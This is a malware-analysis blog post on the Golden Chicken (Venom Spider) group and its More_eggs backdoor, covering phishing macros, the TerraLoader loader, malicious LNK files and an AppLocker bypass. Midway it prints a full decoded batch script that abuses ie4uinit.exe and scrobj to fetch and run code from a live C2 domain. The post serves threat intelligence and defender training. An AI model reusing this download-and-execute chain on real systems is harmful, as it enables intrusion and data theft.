Steal ‘em Eggs: Golden Chicken Hatches More_eggs Backdoor

Renmarc Andrada 16/08/2024
Steal ‘em Eggs: Golden Chicken Hatches More_eggs Backdoor

"Why did the chicken cross the road?" This common riddle is typically answered with, "To get to the other side." Interestingly, this simple joke metaphorically aligns with the tactics, techniques, and procedures (TTPs) of the threat actor we will be discussing, specifically how they infiltrate their targets' environments to steal sensitive information.

Introduction

In this blog, we will delve into the activities of Golden Chicken, also known as Venom Spider, who is responsible for creating the "More_eggs" backdoor. This malware operates under a Malware-as-a-Service (MaaS) architecture, targeting the industrial services industry with the aim of harvesting sensitive information. We will explore their history, recent campaigns, and examine some of the cyber weapons they utilize for espionage.

This research is particularly pertinent given their latest campaign, which uses fake job applicant lures to spread the "More_eggs" malware, as detailed in a report by eSentire

More_eggs Activity Persists Via Fake Job Applicant Lures

Golden Chicken: Who and What Are They?

Golden Chicken, a threat actor behind “More_eggs” backdoor, a JavaScript malware that has been also utilized by other notorious internet crime gangs such as Russian-based FIN6 and Cobalt Group. This malware comes with many names, such as “SpicyOmelette”, “Skid”, and “Terraloader” which varies depending on the threat actors who uses it.

The "More_eggs" JavaScript backdoor was first spotted in the wild in 2018 under the operator “Badbullzvenom”. This sophisticated malware spread through weaponized job listing designed to lure hiring managers and job-seeking professionals. The threat actors crafted fake, infected job offers that, when opened, deployed the "More_eggs" backdoor onto the victims' systems. These deceptive tactics exploited the trust of individuals looking for employment opportunities, making the malware particularly effective in infiltrating corporate networks and harvesting sensitive information.

Golden Chicken: The Smooth Operator

In 2023, the threat actor known as “badbullzvenom,” the mastermind behind the “More_eggs” malware, was claimed to be from Moldova and later given the code name “Jack.” Interestingly, The threat actor is also the owner of a vegetable and fruit import/export business. According to eSentire, Jack's online activities began when he was just 15 years old, as he signed up for various cybercrime forums. Further investigation revealed that “More_eggs” was not Jack’s first project; he had also developed password stealers, crypters, and other malicious tools such as a macros builder named ‘Multiplier’ in 2015 and ‘VenomKit’, which was released in 2017.

Golden Chicken: IOCs and e-Crime Weapons

According to QuoIntelligence, Golden Chicken utilizes "TerraLoader," a multipurpose loader written in PureBasic. TerraLoader typically uses the ".ocx" file extension and is known for employing shortcut files (LNK files) contained within a zip archive. These files are often delivered through links or email attachments. The threat actor exploits legitimate Windows binaries such as "wscript," "cmd," and "ie4unit.exe" to execute malicious commands embedded within the LNK file. Later in this blog, we will analyze some of these Indicators of Compromise (IOCs) as we delve deeper into the topic.

Golden Chicken: e-Crime Weapons Analysis

In this section, we will analyze some of the cyber weapons used by Golden Chicken. We will perform a simple analysis to understand how these tools function during their campaigns, with the help of our threat intelligence community, we have obtained samples such as the malicious XLS files containing macros, the TerraLoader, malicious LNK files and the heavily obfuscated “More_eggs” JavaScript backdoor.

Initial Access: Phishing

These threat actors exploit the weakest point of an organization: its people. They use weaponized emails containing malicious attachments. By performing static analysis on this documents, we can identify unusual strings such as APIs and URLs that a normal document wouldn't contain.

identifying unusual strings such as APIs and URLs that a normal document wouldn't contain

Our indicator that this document requires further investigation is the presence of the "ShellExecuteA()" string, which suggests that the document contains a payload. Using an office analysis tool, we confirmed that a payload is indeed present at this offset.

Further investigating a string which suggests that the document contains a payload

Our analysis reveals that the malicious XLS file functions as a downloader for TerraLoader.

Initial Access: Loader Analysis

We also obtained the “.ocx” file which is the TerraLoader leverage by Golden Chicken, upon analysis it contains interesting strings such as legitimate company names and also the “libatk-x.dll” string which can be used as IOC for detection.

Loader Analysis, further investigation of the file

Upon checking further, it turned out that some sections are packed.

Finding some sections have been packed

Initial Access: LNK File Analysis

The LNK file acts as a malware loader, it uses native Windows tools to perform its function, here we can see that the absolute path is ‘cmd.exe' which means that it uses cmd to execute the following arguments.

Initial Access: LNK File Analysis LNK file acts as a malware loader and has a cmd.exe path

We decode the arguments to know what it does in the system

We decode the arguments to know what it does in the system.

Initial Access: Decoding LNK File Script

We decode the arguments to know what it does in the system. The script contains the following functions:

Sets up several environment variables.

Constructs a path to %appdata%\\Microsoft\\ieuinit.inf.

Writes configuration or script data to this .inf file.

Copies ie4uinit.exe from C:\\Windows\\System32\\ to %appdata%\\Microsoft\\.

Executes ie4uinit.exe with a specific configuration to be run via wscript.

Uses ie4uinit.exe to download the configuration from c2 hxxp[://]jamesstepleton[.]com and save the configuration ieuinit.inf

@echo off
setlocal enabledelayedexpansion

:: Set meaningful variables
set "set_command=set"
call set "s=%set_command:~0,1%"

:: Set more variables
set "w=$w"
set "i=i"
set "a=a"
set "t=t"
set "d=d"
set "dot=."
set "init=init"
set "si=si"
set "e=e"
set "settings=settings"
set "inf=.inf"
set "ieuinit_inf=ieuinit.inf"

:: Construct paths
call set "appdata_path=%appdata%\Microsoft\"
call set "full_path=!appdata_path!!ieuinit_inf!"

:: Write data to the file
(for %%t in (
    "[version]"
    "signature = $windows nt$"
    "[destinationdirs]"
    "A45E=01"
    "[defaultinstall.windows7]"
    "UnRegisterOCXs=F07FD"
    "selfiles=A45E"
    "[F07FD]"
    "%11%\scRobj,NI,hhpp:/jamesstepleton.com/firxmyfcjh"
    "[A45E]"
    "ieuinit.inf"
    "[strings]"
    "settings=init"
    "t=t"
    "servicename=' '"
    "h=h"
    ":=:"
    "/=/"
    "shortsvcname=' '"
    "com=com"
    "b=b"
) do @echo %%~t)>"!full_path!"

:: Copy and execute the file
call set "exe_name=ie4uinit.exe"
call copy /Y %windir%\system32\!exe_name! "!appdata_path!" > nul
start "" /MIN wmic process call create "!appdata_path!!exe_name! -basesettings"

Defense Evasion: Allowlist Bypass

From the decoded script above, we can see the strings “UnRegisterOCXs=F07FD” and it turned out that this string is associated with Applocker Bypass. AppLocker Bypass – CMSTP

From the decoded script it turned out that this string is associated with Applocker Bypass

Golden Chicken: Unhatched Egg

Golden Chicken is known for using JavaScript malware. Fortunately, we have obtained an actual heavily obfuscated sample for analysis. Here is the sample script and its structure. As you can see, it includes variable declarations, conditions, and other elements typical of a standard program.

we have obtained an actual heavily obfuscated sample for analysis. Here is the sample script and its structure

we have obtained an actual heavily obfuscated sample for analysis. Here is the sample script and its structure deeper drive

Detection: YARA Rules

To effectively detect and mitigate the threat posed by the "More_eggs" malware, YARA rules can be employed. YARA (Yet Another Recursive Acronym) is a tool used for identifying and classifying malware. By creating specific rules that match patterns found in the "More_eggs" backdoor and its associated files, security professionals can scan systems for these indicators and take appropriate action.

As an exercise create a simple YARA rule with the details from above. Refer to this YARA documentation for guidance, Writing YARA rules — yara 4.4.0 documentation

Carry on Learning with Blue Team Labs Online

Our research into the Golden Chicken threat actor, also known as Venom Spider, has provided valuable insights into their sophisticated operations and techniques. By dissecting the "More_eggs" backdoor and analyzing their use of several initial access files and also the “More_eggs” JavaScript malware, we have uncovered the intricate methods they employ to infiltrate targets and harvest sensitive information.

To see how the Golden Chicken group infiltrates their target network, we have prepared a lab called "Golden Chicken" on our platform, Blue Team Labs Online. This lab relates to this blog and provides hands-on experience with statically analyzing their e-crime weapons and TTPs. You will learn how their tactics work and gain the knowledge needed to detect them in real-world scenarios.

References

More_eggs Malware Disguised as Resumes Targets Recruiters in Phishing Attack

More_eggs Activity Persists Via Fake Job Applicant Lures

Unmasking VENOM SPIDER

GOLDEN CHICKENS: Evolution of the MaaS

 


 

About Renmarc Andrada

Renmarc Andrada

Renmarc is an avid fan of the phrase 'sharing is the new learning'. As a content developer with years of experience under his belt, he dedicates most of his time to researching both old and new TTPs in broad areas such as DFIR, CTI, threat hunting and malware analysis.